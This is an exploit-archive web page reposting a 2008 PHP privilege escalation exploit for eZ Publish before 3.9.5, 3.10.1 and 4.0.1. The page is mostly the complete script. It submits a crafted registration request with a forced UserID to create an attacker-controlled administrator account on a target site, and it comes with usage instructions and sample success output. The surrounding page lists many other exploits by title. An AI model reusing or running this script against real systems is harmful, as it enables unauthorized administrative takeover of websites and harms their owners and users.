首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
eZ Publish < 3.9.5/3.10.1/4.0.1 Privilege Escalation Exploit
来源:s4avrd0w@p0c.ru 作者:s4avrd0w 发布时间:2008-12-11  

<?php

/*
 eZ Publish privilege escalation exploit by s4avrd0w [s4avrd0w@p0c.ru]
 Versions affected >= 3.5.6
 Resolved in 3.9.5, 3.10.1, 4.0.1
 More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible

 * tested on version 3.9.0

 usage:

 # ./eZPublish_privilege_escalation_exploit.php -u=username -p=password -e=email -s=EZPublish_server

 The options are required:

 -u Login of the new admin on eZ Publish
 -p Password of the new admin on eZ Publish
 -e Email where to go the letter for activation new admin account
 -s Target for privilege escalation

 example:

 # ./eZPublish_privilege_escalation_exploit.php -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
 [+] Exploit successfully sending
 [+] Activate your new account and be registered in system using toor/P@ssw0rd
*/

function help_argc($script_name)
{
print "
usage:

# ./".$script_name." -u=username -p=password -e=email -s=EZPublish_server

The options are required:
 -u Login of the new admin on eZ Publish
 -p Password of the new admin on eZ Publish
 -e Email where to go the letter for activation new admin account
 -s Target for privilege escalation

example:

# ./".$script_name." -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
[+] Exploit successfully sending
[+] Activate your new account and be registered in system using toor/P@ssw0rd

";
}

function successfully($login,$password)
{
print "
[+] Exploit successfully sending
[+] Activate your new account and be registered in system using $login/$password
";
}

if ($argc != 5 || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
 help_argc($argv[0]);
 exit(0);
}
else
{
 $ARG = array();
 foreach ($argv as $arg) {
  if (strpos($arg, '-') === 0) {
   $key = substr($arg,1,1);
   if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg));
  }
 }

 if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s])
 {

  $post_fields = array(
   'ContentObjectAttribute_data_user_login_30' => $ARG[u],
   'ContentObjectAttribute_data_user_password_30' => $ARG[p],
   'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p],
   'ContentObjectAttribute_data_user_email_30' => $ARG[e],
   'UserID' => '14',
   'PublishButton' => '1'
  );

  $headers = array(
      'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
      'Referer' => $ARG[s]
  );

  $res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST);
  $res_http->addPostFields($post_fields);
  $res_http->addHeaders($headers);
  try {
       $response = $res_http->send()->getBody();

   if (eregi("success", $response))
   {
    successfully($ARG[u],$ARG[p]);
   }
   else
   {
    print "[-] Exploit failed";
   }

  } catch (HttpException $exception) {

   print "[-] Not connected";
   exit(0);

  }

 }
 else
 {
  help_argc($argv[0]);
  exit(0);
 }
}

?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel <= 2.6.27.8 ATMSV
·MS Internet Explorer XML Parsi
·MS Internet Explorer XML Parsi
·Internet Explorer 7.0 XML 0da
·Exploits Multiple XSRF in DD-W
·EasyMail ActiveX (emmailstore.
·eZ Publish 3.9.0/3.9.5/3.10.1
·Vinagre < 2.24.2 show_error()
·Internet Explorer 8.0 Beta 2 A
·linux x86 shellcode obfuscator
·MS Visual Basic ActiveX Contro
·Wysi Wiki Wyg 1.0 Remote Passw
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved